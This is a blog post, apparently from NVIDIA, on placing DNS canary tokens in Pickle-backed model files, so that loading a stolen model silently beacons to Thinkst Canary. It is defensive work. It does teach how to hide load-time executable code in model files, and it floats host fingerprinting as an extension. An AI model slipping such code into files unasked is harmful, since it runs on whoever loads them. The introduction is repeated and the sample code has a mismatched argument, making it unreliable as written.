AI models grow in capability and cost of creation, and hold more sensitive or proprietary data, securing them at rest is increasingly important. Organizations are designing policies and tools, often as part of data loss prevention and secure supply chain programs, to protect model weights. While security engineering discussions focus on prevention (How do we prevent X?), detection (Did X happen?) is a similarly critical part of a mature defense-in-depth framework that significantly decreases the time required to detect, isolate, and remediate an intrusion. Currently, these detection capabilities for AI models are identical to those used for monitoring any other sensitive data—no detection capability focuses on the unique nature of AI/ML.
In this post, we'll introduce canaries and then show how the common Python Pickle serialization format for AI and ML models can be augmented with canary tokens to provide additional, AI-specific loss detection capabilities extending beyond normal network monitoring solutions. While more secure model formats like safetensors are preferred, there are many reasons that organizations may still support Pickle-backed model files, and building defenses into them is part of a good risk mitigation strategy.
Canaries: Lightweight Tripwires
At the most basic level, canaries are artifacts left in the environment that no benign user would access. For example, an authorized user often memorizes their password, however, it is not common for the user to search for a password in a credential file and try using the credentials to authenticate to a service on the network. Security engineers can create a fake credential, leave it someplace discoverable, and generate an alert to investigate its access and usage if the credential is ever used. This is the logic behind CanaryTokens. Canaries can be relatively fast and simple to generate, require almost no maintenance, lay dormant in your infrastructure for months, and when placed properly have few false positives.
Thinkst Canary is a security service that helps with the creation and monitoring of canaries. They support a wide range of formats and structures. In this case, we're focusing on DNS Canarytokens. Thinkst dynamically generates unique hostnames for each canary token you want to create. If that hostname is queried in DNS, you get an alert. The feature is incredibly scalable and offers the capability to create custom domains as
Defending AI Model Files from Unauthorized Access with Canaries
As AI models grow in capability and cost of creation, and hold more sensitive or proprietary data, securing them at rest is increasingly important. Organizations are designing policies and tools, often as part of data loss prevention and secure supply chain programs, to protect model weights. While security engineering discussions focus on prevention (How do we prevent X?), detection (Did X happen?) is a similarly critical part of a mature defense-in-depth framework that significantly decreases the time required to detect, isolate, and remediate an intrusion. Currently, these detection capabilities for AI models are identical to those used for monitoring any other sensitive data—no detection capability focuses on the unique nature of AI/ML.
In this post, we'll introduce canaries and then show how the common Python Pickle serialization format for AI and ML models can be augmented with canary tokens to provide additional, AI-specific loss detection capabilities extending beyond normal network monitoring solutions. While more secure model formats like safetensors are preferred, there are many reasons that organizations may still support Pickle-backed model files, and building defenses into them is part of a good risk mitigation strategy.
Canaries: Lightweight Tripwires
At the most basic level, canaries are artifacts left in the environment that no benign user would access. For example, an authorized user often memorizes their password, however, it is not common for the user to search for a password in a credential file and try using the credentials to authenticate to a service on the network. Security engineers can create a fake credential, leave it someplace discoverable, and generate an alert to investigate its access and usage if the credential is ever used. This is the logic behind CanaryTokens. Canaries can be relatively fast and simple to generate, require almost no maintenance, lay dormant in your infrastructure for months, and when placed properly have few false positives.
Thinkst Canary is a security service that helps with the creation and monitoring of canaries. They support a wide range of formats and structures. In this case, we're focusing on DNS Canarytokens. Thinkst dynamically generates unique hostnames for each canary token you want to create. If that hostname is queried in DNS, you get an alert. The feature is incredibly scalable and offers the capability to create custom domains as well. While this blog post presents automated Canary creation, it's also possible to manually use a free version of Canarytokens or build and maintain your own canary tracking and alerting system.
Machine Learning Model Formats
The recent focus on machine learning security often focuses on the deserialization vulnerability of Python Pickle and Pickle-backed file formats. While this obviously includes files ending in .pkl, it may also include files like those generated by PyTorch or other ML-adjacent libraries such as NumPy. If a user loads an untrusted Pickle, they're exposing themselves to arbitrary code execution. Most of the analysis and scope of arbitrary code execution has focused on the potential for malware to impact the host or the machine learning system.
We asked ourselves: "If we must use models with this (vulner)ability, can we use it for good?"
Machine Learning Model Canaries
It is relatively easy to inject code into a serialized model artifact that beacons as a canary. In our initial research, we used Thinkst DNS Canarytokens to preserve all original functionality but also silently beacon to Thinkst when loaded. We can use this to either track usage or identify if someone is using a model that should never be used (a true canary). If necessary, with this alert, we can trigger an incident response playbook or hunt operation. Figure 1 shows the workflow from canary generation to an unauthorized user generating an alert.
A flow diagram showing a user generating a unique token identifier, injecting the token-calling code into a model file and placing the canary in an object store before an unauthorized user downloads the model and loads it which generates an alert. Figure 1. The Canary Model generation and alerting process
As shown, in the following code block, the approach is easy to implement with Thinkst Canary or can be used with proprietary server-side tracking functionality.
def inject_pickle(original: Path, out: Path, target: str): """ Mock for a function that takes a pickle-backed model file, injects code to ping <target> and writes it to an output file """ return def get_hostname(location: str) -> str: """ Register with Thinkst server and get DNS canary """ url = 'https://EXAMPLE.canary.tools/api/v1/canarytoken/create' payload = { 'auth_token': api_key, 'memo': f"ML Canary: {location}", 'kind': 'dns', } r = requests.post(url, data=payload) return r.json()["canarytoken"]["hostname"] def upload(file: Path, destination: str): """ Mock for uploading a file to a destination """ return def create_canary(model_file: Path, canary_file: Path, destination: str): """ Register a new canary with Thinkst and generate a new 'canarified' model """ host = get_hostname(memo=f"Model Canary at {destination}/{canary_file.name}") inject_pickle(model_file, canary_file, host) upload(canary_file, destination) create_canary("model.pkl", "super_secret_model.pkl", "s3://model-bucket/")
The provided code contains a diff that demonstrates how the serialized model is prepended with a call to exec. This call functions as a beacon to our Canary DNS endpoint.
Here's how it might work in practice. A security engineer creates a canary model file and places it in a private repository. Months later, a Thinkst Canary alert is triggered and an incident response process, tailored towards securing private repositories and sensitive models, is initiated. Leveraging this signal at its earliest stage, defenders can identify, isolate, and remediate the misconfiguration that enabled the unauthorized access.
The basic beacon on load functionality can be just the beginning, which is the beauty of arbitrary code execution. This technique could extended to more granular host fingerprinting or other cyber deception operations.
Secure AI Strategy
A secure AI strategy can start with secure file formats and strong preventative controls. It's important to consider mitigating residual risk by adding canary functionality to a detection strategy and be alerted if an unauthorized user accesses proprietary models. Compared with other defensive controls, canary models are easy to implement, require no maintenance or overhead, and can generate actionable alerts. These techniques move us towards a world where unauthorized users should think twice before searching for, exfiltrating, and executing models.
For more information about AI Security, check out other NVIDIA Technical Blog posts.
Conclusion
In this post, we introduced canaries and showed how the common Python Pickle serialization format for AI and ML models can be augmented with canary tokens to provide additional, AI-specific loss detection capabilities extending beyond normal network monitoring solutions. We demonstrated how to create a canary model file and place it in a private repository, and how to use Thinkst Canary to generate an alert if an unauthorized user accesses the model. This technique can be used to detect and respond to unauthorized access to sensitive models, and can be extended to more granular host fingerprinting or other cyber deception operations.
#AI #MachineLearning #Security #Canaries #DataProtection #ModelSecurity #Cybersecurity #IncidentResponse #ThreatDetection #AIModels #MLModels #PickleSerialization #Safetensors #ThinkstCanary